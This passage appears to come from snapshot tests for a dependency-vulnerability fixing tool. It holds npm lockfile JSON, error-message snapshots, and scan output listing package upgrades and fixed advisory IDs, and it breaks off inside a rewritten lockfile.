"sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_with_invalid_data_source - 1] --- [TestCommand/errors_with_invalid_data_source - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand/errors_with_unsupported_format - 1] --- [TestCommand/errors_with_unsupported_format - 2] unsupported output format "yaml" - must be one of: text, json --- [TestCommand/errors_with_unsupported_strategy - 1] --- [TestCommand/errors_with_unsupported_strategy - 2] unsupported strategy "force" - must be one of: in-place, relax, override --- [TestCommand/fix_non-interactive_in-place_package-lock.json - 1] Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... 
--- [TestCommand/fix_non-interactive_in-place_package-lock.json - 2] --- [TestCommand/fix_non-interactive_in-place_package-lock.json - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": 
"https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": 
"sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": 